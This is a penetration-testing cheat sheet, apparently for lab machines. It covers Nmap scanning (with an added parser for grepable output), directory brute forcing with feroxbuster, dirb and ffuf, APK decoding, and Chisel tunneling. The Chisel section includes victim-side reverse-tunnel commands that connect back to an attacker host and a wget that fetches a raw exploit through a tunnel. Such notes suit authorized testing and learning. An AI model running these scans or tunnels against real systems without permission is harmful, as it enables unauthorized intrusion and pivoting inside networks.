# Tools & Cheat Sheet

## Nmap

```
# Stage 1: fast full-range TCP port sweep, saved in grepable format for parsing
nmap -p- -T5 --min-rate=1000 10.10.10.239 -oG fkclai.nmap
# Stage 2: pull the open ports out of the grepable output and run default scripts
# plus version detection against only those ports (paste joins them without a trailing comma)
nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | paste -s -d ',') -sC -sV 10.10.10.239 -oN nmap-result.txt
```
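The grep/cut pipeline above works, but it also matches ports in other states if the pattern ever loosens and relies on the scan having exactly one host. The function below is an added example, not part of the original cheat sheet: it parses Nmap's grepable (`-oG`) format properly, keeps only `open` TCP ports, de-duplicates across hosts and emits the comma-separated list `nmap -p` expects. The sample `.gnmap` content and hosts are constructed for the demo; real Nmap output separates fields with tabs, which the parser tolerates as well.

```shell
#!/bin/sh
# Parse Nmap grepable output (-oG) into a port list for the second-stage scan.
# Not part of the original cheat sheet; the sample scan output below is constructed.

# Constructed sample of -oG output (hosts, ports and services are made up).
SAMPLE_GNMAP="$(mktemp)"
trap 'rm -f "$SAMPLE_GNMAP"' EXIT
cat > "$SAMPLE_GNMAP" <<'EOF'
# Nmap 7.94 scan initiated as: nmap -p- -oG sample.gnmap 10.0.0.5 10.0.0.6
Host: 10.0.0.5 ()  Status: Up
Host: 10.0.0.5 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 135/filtered/tcp//msrpc///, 443/open/tcp//https///  Ignored State: closed (65531)
Host: 10.0.0.6 ()  Ports: 80/open/tcp//http///, 8080/open/tcp//http-proxy///
# Nmap done -- 2 IP addresses (2 hosts up) scanned
EOF

# open_ports_from_gnmap FILE
# Prints the open TCP ports found in FILE as "22,80,443" (sorted, unique,
# no trailing comma). Filtered/closed entries and non-TCP ports are skipped.
open_ports_from_gnmap() {
  awk -F'Ports: ' '/Ports: / {
      n = split($2, entry, ", ")
      for (i = 1; i <= n; i++) {
          # Each entry is port/state/protocol/owner/service/rpcinfo/version
          split(entry[i], f, "/")
          if (f[2] == "open" && f[3] == "tcp" && !(f[1] in seen)) {
              seen[f[1]] = 1
              print f[1]
          }
      }
  }' "$1" | sort -n | paste -s -d ',' -
}

# Demo on the constructed file; prints 22,80,443,8080
open_ports_from_gnmap "$SAMPLE_GNMAP"

# Real use, replacing the grep/cut/tr pipeline in the stage-2 command (not run here):
# nmap -p "$(open_ports_from_gnmap fkclai.nmap)" -sC -sV 10.10.10.239 -oN nmap-result.txt
```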

## Directory Brute Force

```
# feroxbuster: recursive brute force, also trying the .php extension on every word
feroxbuster -u http://pikatwoo.pokatmon.htb -x php

# dirb: classic wordlist brute force, results written to a file
dirb http://10.10.10.239/ /usr/share/wordlists/dirb/common.txt -o dirb-239.result

# ffuf: fuzz the path segment, match all status codes but auto-calibrate away the baseline noise
ffuf -u http://10.10.11.199:8080/v1/AUTH_andrew/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -mc all -ac
```

## APK Analysis

```
# Static APK Analysis

# Decode the package (resources, smali, manifest) into a directory
apktool d mobile-app.apk
# Check the decoded AndroidManifest.xml

# Configure
```

## HTTP Tunnel

### Chisel

Source: <https://github.com/jpillora/chisel.git>

<https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html>

#### 1. Reverse Tunneling

```
# Hacker machine
# Start a chisel server on port 12345 that accepts reverse (R:) port forwards
./chisel server -p 12345 --reverse

# Victim machine
# Connect back to the server and open port 1337 there; traffic hitting it is
# forwarded from the victim to [dump host ip]:8000
./chisel client [hacker IP]:12345 R:1337:[dump host ip]:8000

# Hacker machine
# http://localhost:1337/ => http://[dump host ip]:8000
```

#### 2. TCP Basic Tunneling

```
# Chisel server on 1.1.1.1
./chisel server -p 1234

# Chisel client on 2.2.2.2: local port 1337 is forwarded through the server to www.exploit-db.com:443
./chisel client 1.1.1.1:1234 1337:www.exploit-db.com:443
# Fetch through the local forward; the TLS certificate is for exploit-db, not localhost,
# and the site is virtual-hosted, hence the certificate check is skipped and the Host header set
wget --no-check-certificate --header 'Host: www.exploit-db.com' https://localhost:1337/raw/45782
```
